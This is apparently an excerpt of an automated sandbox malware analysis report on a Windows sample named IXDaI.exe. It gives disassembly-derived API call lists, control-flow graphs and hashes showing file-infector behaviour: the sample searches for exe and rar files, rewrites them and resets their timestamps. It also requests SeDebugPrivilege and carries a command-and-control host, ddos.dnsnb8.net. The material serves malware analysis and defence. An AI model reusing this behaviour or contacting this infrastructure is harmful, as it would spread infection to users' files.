                                                                                      • CreateThread.KERNEL32(00000000,00000000,00BA2B7D,?,00000000,00000000), ref: 00BA2BEE
                                                                                      • lstrlen.KERNEL32(?), ref: 00BA2BFB
                                                                                      • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00BA2C16
                                                                                      • CreateThread.KERNEL32(00000000,00000000,00BA2845,00000000,00000000,00000000), ref: 00BA2C3A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                                                                      • String ID:
                                                                                      • API String ID: 1073171358-0
                                                                                      • Opcode ID: a754118f2a5551eb37f2afbc590d96f0230c319e95cafc0a11d28be765e7353d
                                                                                      • Instruction ID: 7e2eb6c8e732cd8ad2ab308130f72c843d52e032cf84c5e5e0d9f050075df7a2
                                                                                      • Opcode Fuzzy Hash: a754118f2a5551eb37f2afbc590d96f0230c319e95cafc0a11d28be765e7353d
                                                                                      • Instruction Fuzzy Hash: 872105B180414CAFE7349F689C85EAE7BECFF06354B500125F94293161DB248D0ACB70

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 16 ba1e6e-ba1e95 call ba2d60 19 ba1e9c-ba1eaa call ba1df6 16->19 20 ba1e97 call ba1d8a 16->20 24 ba2332 19->24 25 ba1eb0-ba1ed9 SetFileAttributesA CreateFileA 19->25 20->19 27 ba2338-ba233b 24->27 25->24 26 ba1edf-ba1f28 call ba1915 SetFilePointer CreateFileMappingA MapViewOfFile 25->26 26->24 36 ba1f2e-ba1f39 26->36 29 ba233d-ba2340 UnmapViewOfFile 27->29 30 ba2346-ba2349 27->30 29->30 31 ba234b-ba234e FindCloseChangeNotification 30->31 32 ba2350-ba2354 30->32 31->32 34 ba2391-ba239a call ba2d9b 32->34 35 ba2356-ba235b CloseHandle 32->35 35->34 36->24 38 ba1f3f-ba1f56 36->38 38->24 40 ba1f5c-ba1f64 38->40 40->24 41 ba1f6a-ba1f70 40->41 41->24 42 ba1f76-ba1f87 call ba1c81 41->42 42->24 45 ba1f8d-ba1fa7 call ba185b call ba1c81 42->45 45->24 50 ba1fad-ba1fb4 45->50 51 ba1fb6-ba1fc5 call ba1af9 50->51 52 ba2024-ba2045 50->52 51->52 60 ba1fc7-ba1fd2 51->60 52->24 53 ba204b-ba204e 52->53 55 ba2070-ba20f4 call ba1af9 * 2 call ba1c68 * 2 memset * 2 53->55 56 ba2050-ba2053 53->56 78 ba20f5-ba20fe 55->78 58 ba2056-ba205a 56->58 58->55 61 ba205c-ba2061 58->61 60->24 63 ba1fd8-ba1fe7 60->63 61->24 64 ba2067-ba206e 61->64 66 ba1fe9-ba1fec 63->66 67 ba1fef-ba2006 call ba1af9 63->67 64->58 66->67 73 ba2008-ba200e call ba1c68 67->73 74 ba2013-ba201e FlushViewOfFile 67->74 73->74 74->52 79 ba2130-ba2139 78->79 80 ba2100-ba2114 78->80 83 ba213c-ba2142 79->83 81 ba212d-ba212e 80->81 82 ba2116-ba212a 80->82 81->78 82->81 84 ba215c 83->84 85 ba2144-ba2150 83->85 88 ba215f-ba2162 84->88 86 ba2152-ba2154 85->86 87 ba2157-ba215a 85->87 86->87 87->83 89 ba2181-ba2184 88->89 90 ba2164-ba2171 88->90 93 ba218d-ba21ba call ba1c68 89->93 94 ba2186 89->94 91 ba232a-ba232d 90->91 92 ba2177-ba217e 90->92 91->88 92->89 97 ba21bc-ba21d0 call ba1c68 93->97 98 ba21d3-ba220b call ba1c81 call ba1c68 93->98 94->93 97->98 105 ba221b-ba221e 98->105 106 ba220d-ba2218 call ba1c68 98->106 108 ba2220-ba2223 105->108 109 ba2226-ba231a memcpy UnmapViewOfFile FindCloseChangeNotification call ba1b8a call ba185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call ba1915 105->109 106->105 108->109 116 ba231f-ba2328 CloseHandle 109->116 116->27
                                                                                      APIs
                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?,00BA32B0,00000164,00BA2986,?), ref: 00BA1EB9
                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00BA1ECD
                                                                                      • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00BA1EF3
                                                                                      • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00BA1F07
                                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00BA1F1D
                                                                                      • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00BA201E
                                                                                      • memset.MSVCRT ref: 00BA20D8
                                                                                      • memset.MSVCRT ref: 00BA20EA
                                                                                      • memcpy.MSVCRT ref: 00BA222D
                                                                                      • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BA2238
                                                                                      • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BA224A
                                                                                      • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BA22C6
                                                                                      • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BA22CB
                                                                                      • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BA22DD
                                                                                      • WriteFile.KERNEL32(000000FF,00BA4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BA22F7
                                                                                      • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BA230D
                                                                                      • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BA2322
                                                                                      • UnmapViewOfFile.KERNEL32(?,?,00BA32B0,00000164,00BA2986,?), ref: 00BA2340
                                                                                      • FindCloseChangeNotification.KERNEL32(?,?,00BA32B0,00000164,00BA2986,?), ref: 00BA234E
                                                                                      • CloseHandle.KERNEL32(000000FF,?,00BA32B0,00000164,00BA2986,?), ref: 00BA2359
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 3349749541-0
                                                                                      • Opcode ID: 7ffffab430e183a1923277c79a75daddb751b0ce59d4f2a9d25577e9ba6a9d72
                                                                                      • Instruction ID: dec304b9a7e98b4da5376c6c6dc5fa7ec48f20acdb74b906ea40a76a7db40f97
                                                                                      • Opcode Fuzzy Hash: 7ffffab430e183a1923277c79a75daddb751b0ce59d4f2a9d25577e9ba6a9d72
                                                                                      • Instruction Fuzzy Hash: B6F15971904208EFCB24DFA8DC81AADBBF5FF0A314F10856AE519A7661D730AE81CF54

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 117 ba1973-ba199a PathFileExistsA 118 ba19a0-ba19aa 117->118 119 ba1ac7-ba1acc 117->119 122 ba19af-ba19c2 CreateFileA 118->122 120 ba1ace 119->120 121 ba1ad0-ba1ad5 119->121 120->121 123 ba1af0-ba1af6 121->123 124 ba1ad7-ba1ad9 121->124 125 ba1a28-ba1a36 GetFileSize 122->125 126 ba19c4-ba19d3 Sleep 122->126 124->123 127 ba1a38-ba1a3b 125->127 128 ba1a87-ba1a8b 125->128 126->122 129 ba19d5-ba1a0b call ba185b wsprintfA CopyFileA 126->129 127->128 130 ba1a3d-ba1a51 VirtualAlloc 127->130 131 ba1a8d-ba1a90 FindCloseChangeNotification 128->131 132 ba1a96-ba1a9a 128->132 129->125 140 ba1a0d-ba1a26 CreateFileA 129->140 130->128 135 ba1a53-ba1a57 130->135 131->132 136 ba1a9c 132->136 137 ba1aad-ba1ab1 132->137 141 ba1a59-ba1a6d ReadFile 135->141 142 ba1a80 135->142 143 ba1aa0-ba1aa7 DeleteFileA 136->143 138 ba1adb-ba1ae0 137->138 139 ba1ab3-ba1ab6 137->139 146 ba1ae2-ba1ae5 138->146 147 ba1ae7-ba1aec 138->147 139->119 144 ba1ab8-ba1ac1 VirtualFree 139->144 140->125 145 ba1a9e 140->145 141->128 148 ba1a6f-ba1a7e 141->148 142->128 143->137 144->119 145->143 146->147 147->123 149 ba1aee 147->149 148->141 148->142 149->123
                                                                                      APIs
                                                                                      • PathFileExistsA.SHLWAPI(00BA4E5C,00000000,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00BA1992
                                                                                      • CreateFileA.KERNEL32(00BA4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00BA19BA
                                                                                      • Sleep.KERNEL32(00000064), ref: 00BA19C6
                                                                                      • wsprintfA.USER32 ref: 00BA19EC
                                                                                      • CopyFileA.KERNEL32(00BA4E5C,?,00000000), ref: 00BA1A00
                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA1A1E
                                                                                      • GetFileSize.KERNEL32(00BA4E5C,00000000), ref: 00BA1A2C
                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00BA1A46
                                                                                      • ReadFile.KERNEL32(00BA4E5C,00BA4E60,00000000,?,00000000), ref: 00BA1A65
                                                                                      • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00BA1A90
                                                                                      • DeleteFileA.KERNEL32(?), ref: 00BA1AA7
                                                                                      • VirtualFree.KERNEL32(00BA4E60,00000000,00008000), ref: 00BA1AC1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                                                                      • String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                      • API String ID: 2523042076-762731565
                                                                                      • Opcode ID: 014e2263af72eab5ae1faede6ed96dd7cb9d03144feaf7910e03a0bd0bd85161
                                                                                      • Instruction ID: e35ce64f2a6fa2ce5b5edc13d08044295eef7c423def490d760a6f79f0390f36
                                                                                      • Opcode Fuzzy Hash: 014e2263af72eab5ae1faede6ed96dd7cb9d03144feaf7910e03a0bd0bd85161
                                                                                      • Instruction Fuzzy Hash: 83517E71905219EFCB209F98CC85AAEBBF9FB06754F1049A9F525E7190C7709E40CB50

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 150 ba28b8-ba28ff memset wsprintfA 151 ba29db-ba29df 150->151 152 ba2905-ba290d 150->152 152->151 153 ba2913-ba2919 152->153 154 ba291b-ba294c memset wsprintfA call ba29e2 153->154 155 ba2956-ba2965 strrchr 153->155 158 ba2951 154->158 155->151 157 ba2967-ba2978 lstrcmpiA 155->157 159 ba297a-ba2981 call ba1e6e 157->159 160 ba2988-ba2992 lstrcmpiA 157->160 158->151 163 ba2986 159->163 160->151 162 ba2994-ba299b 160->162 164 ba29ad-ba29c9 strstr 162->164 165 ba299d-ba29a3 162->165 163->151 167 ba29cb-ba29d1 call ba239d 164->167 168 ba29d3-ba29d6 call ba2692 164->168 165->164 166 ba29a5-ba29a7 lstrcpy 165->166 166->164 167->151 168->151
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00BA28D3
                                                                                      • wsprintfA.USER32 ref: 00BA28F7
                                                                                      • memset.MSVCRT ref: 00BA2925
                                                                                      • wsprintfA.USER32 ref: 00BA2940
                                                                                        • Part of subcall function 00BA29E2: memset.MSVCRT ref: 00BA2A02
                                                                                        • Part of subcall function 00BA29E2: wsprintfA.USER32 ref: 00BA2A1A
                                                                                        • Part of subcall function 00BA29E2: memset.MSVCRT ref: 00BA2A44
                                                                                        • Part of subcall function 00BA29E2: lstrlen.KERNEL32(?), ref: 00BA2A54
                                                                                        • Part of subcall function 00BA29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00BA2A6C
                                                                                        • Part of subcall function 00BA29E2: strrchr.MSVCRT ref: 00BA2A7C
                                                                                        • Part of subcall function 00BA29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00BA2A9F
                                                                                        • Part of subcall function 00BA29E2: lstrlen.KERNEL32(Documents and Settings), ref: 00BA2AAE
                                                                                        • Part of subcall function 00BA29E2: memset.MSVCRT ref: 00BA2AC6
                                                                                        • Part of subcall function 00BA29E2: memset.MSVCRT ref: 00BA2ADA
                                                                                        • Part of subcall function 00BA29E2: FindFirstFileA.KERNEL32(?,?), ref: 00BA2AEF
                                                                                        • Part of subcall function 00BA29E2: memset.MSVCRT ref: 00BA2B13
                                                                                      • strrchr.MSVCRT ref: 00BA2959
                                                                                      • lstrcmpiA.KERNEL32(00000001,exe), ref: 00BA2974
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                                                                      • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                                                                      • API String ID: 3004273771-1101464738
                                                                                      • Opcode ID: c32d1e314accfa35226765ff2c230293c0aed64be595f9a2222158ef3a755c45
                                                                                      • Instruction ID: ebcaf1d22ca2a7aecd61acce36e9798c05207976a2defb3fb3f6a1f3f215ec83
                                                                                      • Opcode Fuzzy Hash: c32d1e314accfa35226765ff2c230293c0aed64be595f9a2222158ef3a755c45
                                                                                      • Instruction Fuzzy Hash: 203175719483197BDB209768DC86FDB77ECDB17B10F0404E2F945A3191EAB4DAC48B60

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00BA164F
                                                                                      • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00BA165B
                                                                                      • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXDaI.exe,00000104), ref: 00BA166E
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 00BA16AC
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00BA16BD
                                                                                        • Part of subcall function 00BA139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00BA13BC
                                                                                        • Part of subcall function 00BA139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00BA13DA
                                                                                        • Part of subcall function 00BA139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00BA1448
                                                                                      • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00BA16E5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IXDaI.exe$C:\Windows\system32$Documents and Settings
                                                                                      • API String ID: 123563730-236263198
                                                                                      • Opcode ID: c8eb9d291e36f5aa5853c0e88afea5f108c1d24cd6dab84169e69f1621f89193
                                                                                      • Instruction ID: 1115ae0d663c2b5312a6b0e542ed7e576bd78de8df625487e4be2455cbb665e3
                                                                                      • Opcode Fuzzy Hash: c8eb9d291e36f5aa5853c0e88afea5f108c1d24cd6dab84169e69f1621f89193
                                                                                      • Instruction Fuzzy Hash: 441196715092147BCB705BA89D4FF9F7EEDEB57761F100491F20996060DBB08940C7B1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 205 ba1000-ba1023 CreateFileA 206 ba1092-ba1096 205->206 207 ba1025-ba1055 GetFileSize CreateFileMappingA MapViewOfFile 205->207 208 ba107b-ba1085 207->208 209 ba1057-ba105f 207->209 212 ba108d-ba1091 CloseHandle 208->212 213 ba1087-ba108b CloseHandle 208->213 210 ba1061-ba106e call ba17d0 209->210 211 ba1074-ba1075 UnmapViewOfFile 209->211 210->211 211->208 212->206 213->212
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00BA10E8,?), ref: 00BA1018
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,77068400,?,http://%s:%d/%s/%s,00BA10E8,?), ref: 00BA1029
                                                                                      • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00BA1038
                                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00BA10E8,?), ref: 00BA104B
                                                                                      • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00BA10E8,?), ref: 00BA1075
                                                                                      • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00BA10E8,?), ref: 00BA108B
                                                                                      • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00BA10E8,?), ref: 00BA108E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                                                                      • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                      • API String ID: 1223616889-3273462101
                                                                                      • Opcode ID: 25f00631f098efe383009982320cffa839ca11dfd854525f6814b30f2d2b2964
                                                                                      • Instruction ID: 16b6f4e33d1269745802f62c306d2b7cc2d8daaba8f05d392d48d23838893efa
                                                                                      • Opcode Fuzzy Hash: 25f00631f098efe383009982320cffa839ca11dfd854525f6814b30f2d2b2964
                                                                                      • Instruction Fuzzy Hash: 810192B120435CBFE7706F649C89F2BBBECEB45BA9F004929F245A3090DA705E448B70

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 375 ba2c48-ba2c75 memset call ba1973 378 ba2cb2-ba2cb9 375->378 379 ba2c77-ba2c7f 375->379 382 ba2cbb-ba2cc2 VirtualFree 378->382 383 ba2cc8-ba2ccc 378->383 380 ba2c8f-ba2cac CreateThread WaitForMultipleObjects 379->380 381 ba2c81-ba2c8b 379->381 380->378 381->380 382->383
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00BA2C57
                                                                                        • Part of subcall function 00BA1973: PathFileExistsA.SHLWAPI(00BA4E5C,00000000,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00BA1992
                                                                                        • Part of subcall function 00BA1973: CreateFileA.KERNEL32(00BA4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00BA19BA
                                                                                        • Part of subcall function 00BA1973: Sleep.KERNEL32(00000064), ref: 00BA19C6
                                                                                        • Part of subcall function 00BA1973: wsprintfA.USER32 ref: 00BA19EC
                                                                                        • Part of subcall function 00BA1973: CopyFileA.KERNEL32(00BA4E5C,?,00000000), ref: 00BA1A00
                                                                                        • Part of subcall function 00BA1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA1A1E
                                                                                        • Part of subcall function 00BA1973: GetFileSize.KERNEL32(00BA4E5C,00000000), ref: 00BA1A2C
                                                                                        • Part of subcall function 00BA1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00BA1A46
                                                                                        • Part of subcall function 00BA1973: ReadFile.KERNEL32(00BA4E5C,00BA4E60,00000000,?,00000000), ref: 00BA1A65
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00BA2C99
                                                                                      • WaitForMultipleObjects.KERNEL32(00000001,00BA16BA,00000001,000000FF,?,00BA16BA,00000000), ref: 00BA2CAC
                                                                                      • VirtualFree.KERNEL32(01110000,00000000,00008000,C:\Users\user\AppData\Local\Temp\IXDaI.exe,00BA4E5C,00BA4E60,?,00BA16BA,00000000), ref: 00BA2CC2
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00BA2C69
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                      • API String ID: 2042498389-699841801
                                                                                      • Opcode ID: 25cad209bb2121c19092a3fe672e8282bf01e21408fa685c7748817b1de7cd11
                                                                                      • Instruction ID: 1e37f43a38e10c759e20a21fd7aaf5fbac0eedc8a98e8cdcfb9fe7e703bf28a0
                                                                                      • Opcode Fuzzy Hash: 25cad209bb2121c19092a3fe672e8282bf01e21408fa685c7748817b1de7cd11
                                                                                      • Instruction Fuzzy Hash: 25018F71649220BBD724ABA9DC0AEAF7EECEF43B60F504150B905D61D1EBE09A40C7B1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 384 ba14e1-ba14fb 385 ba14fd-ba1510 GetModuleHandleA 384->385 386 ba1541-ba1547 384->386 389 ba151a-ba1535 VirtualQuery 385->389 390 ba1512-ba1518 385->390 387 ba1549-ba154c 386->387 388 ba1573-ba1574 call ba1638 386->388 393 ba1569-ba1570 387->393 394 ba154e-ba1555 387->394 397 ba1579-ba157a ExitProcess 388->397 391 ba153b 389->391 392 ba1537-ba1539 389->392 390->386 391->386 392->386 392->391 394->393 396 ba1557-ba1566 call ba1af9 394->396 396->393
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00BA1504
                                                                                      • VirtualQuery.KERNEL32(00BA14E1,?,0000001C), ref: 00BA1525
                                                                                      • ExitProcess.KERNEL32 ref: 00BA157A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitHandleModuleProcessQueryVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3946701194-0
                                                                                      • Opcode ID: 9561d34195f2e1f1f0f671724cbfbc5e50489d7ea6a10a78a5125d3aa61f2a43
                                                                                      • Instruction ID: a971aa67f7ce341dd4624b53e457d6240ec6a53d72a48a57f6ebd189dd78544a
                                                                                      • Opcode Fuzzy Hash: 9561d34195f2e1f1f0f671724cbfbc5e50489d7ea6a10a78a5125d3aa61f2a43
                                                                                      • Instruction Fuzzy Hash: EA115A71D48214DFCB60DFADA886A79B7E8EBD6710F10447AF442E3150DBB48D419B50

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 400 ba1915-ba1922 401 ba1928-ba192c 400->401 402 ba1924-ba1926 400->402 404 ba192e-ba194d memset GetFileTime 401->404 405 ba194f-ba1952 401->405 403 ba196e-ba1970 402->403 406 ba1966-ba1968 404->406 405->403 407 ba1954-ba1960 SetFileTime 405->407 408 ba196a 406->408 409 ba196c 406->409 407->406 408->409 409->403
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File
